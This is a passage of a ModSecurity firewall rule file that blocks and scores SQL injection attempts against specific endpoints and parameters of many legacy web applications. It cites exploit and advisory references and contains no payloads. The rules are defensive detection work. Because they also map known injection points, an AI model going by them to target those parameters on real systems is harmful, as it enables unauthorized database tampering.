UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3141'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGB OpenSource Guestbook SQL Injection Attempt -- email.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006230) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006230,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:p/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- detail.asp p UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006236) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE SecRule REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006236,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:l/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp l UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006242) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE SecRule REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006242,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:typ/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp typ UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006248) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE SecRule REQUEST_LINE "@contains /listings.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006248,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21073'" SecRule &TX:'/SQL_INJECTION.*ARGS:loc/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MGinternet Property Site Manager SQL Injection Attempt -- listings.asp loc UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003992) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003992,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3944/'" SecRule &TX:'/SQL_INJECTION.*ARGS:listid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- index.php listid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE SecRule REQUEST_LINE "@contains /moscomment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004432,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20650'" SecRule &TX:'/SQL_INJECTION.*ARGS:mcname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- moscomment.php mcname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004438) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE SecRule REQUEST_LINE "@contains /com_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004438,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20650'" SecRule &TX:'/SQL_INJECTION.*ARGS:mcname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo SQL Injection Attempt -- com_comment.php mcname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE SecRule REQUEST_LINE "@contains /includes/mambo.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004771,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20413'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo LaiThai SQL Injection Attempt -- mambo.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011095) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /WorkOrder.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011095,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:woID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Manage Engine Service Desk Plus WorkOrder.do UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE SecRule REQUEST_LINE "@contains /news_page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005146,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3194/'" SecRule &TX:'/SQL_INJECTION.*ARGS:uid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Martyn Kilbryde Newsposter Script SQL Injection Attempt -- news_page.asp uid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004270) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004270,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7171'" SecRule REQUEST_LINE "@contains x[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004276) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004276,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:t/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php t UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004282) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004282,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:productId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php productId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004288) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004288,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:sk/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php sk UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004294) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004294,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:x/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php x UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004300) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE SecRule REQUEST_LINE "@contains /product_review.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004300,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:so/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- product_review.php so UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004306) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- order-track.php orderNo UPDATE SecRule REQUEST_LINE "@contains /order-track.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004306,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- order-track.php orderNo UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21072'" SecRule &TX:'/SQL_INJECTION.*ARGS:orderNo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Koan Software Mega Mall SQL Injection Attempt -- order-track.php orderNo UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE SecRule REQUEST_LINE "@contains /lire-avis.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006350,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21513'" SecRule &TX:'/SQL_INJECTION.*ARGS:aa/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Messageriescripthp SQL Injection Attempt -- lire-avis.php aa UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp kullanici_ismi UPDATE SecRule REQUEST_LINE "@contains /uye_giris_islem.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006800,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp kullanici_ismi UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21418'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullanici_ismi/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp kullanici_ismi UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006806) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE SecRule REQUEST_LINE "@contains /uye_giris_islem.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006806,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21418'" SecRule &TX:'/SQL_INJECTION.*ARGS:sifre/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Metyus Okul Yonetim Sistemi SQL Injection Attempt -- uye_giris_islem.asp sifre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE SecRule REQUEST_LINE "@contains /duyuru.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3120'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MiNT Haber Sistemi SQL Injection Attempt -- duyuru.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE SecRule REQUEST_LINE "@contains /item_show.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007011,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'" SecRule &TX:'/SQL_INJECTION.*ARGS:id2006quant/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_show.asp id2006quant UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE SecRule REQUEST_LINE "@contains /item_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007017,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'" SecRule &TX:'/SQL_INJECTION.*ARGS:maingroup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp maingroup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE SecRule REQUEST_LINE "@contains /item_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007023,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21273'" SecRule &TX:'/SQL_INJECTION.*ARGS:secondgroup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MidiCart ASP Shopping Cart and ASP Plus Shopping Cart SQL Injection Attempt -- item_list.asp secondgroup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004169) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004169,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3519'" SecRule &TX:'/SQL_INJECTION.*ARGS:c/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Minerva mod SQL Injection Attempt -- forum.php c UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005783) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName UPDATE SecRule REQUEST_LINE "@contains /admin_check_user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005783,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3105'" SecRule &TX:'/SQL_INJECTION.*ARGS:txtUserName/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Motionborg Web Real Estate SQL Injection Attempt -- admin_check_user.asp txtUserName UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003840,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1830'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyConference SQL Injection Attempt -- index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006632) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE SecRule REQUEST_LINE "@contains /mystats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006632,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-6403'" SecRule &TX:'/SQL_INJECTION.*ARGS:details/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyStats SQL Injection Attempt -- mystats.php details UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004617) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE SecRule REQUEST_LINE "@contains /diary.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004617,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/470483/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:delete/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS My Datebook SQL Injection Attempt -- diary.php delete UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004100,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3989/'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS My Little Forum SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004747) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nabopoll SQL Injection Attempt -- result.php surv UPDATE SecRule REQUEST_LINE "@contains /result.php" 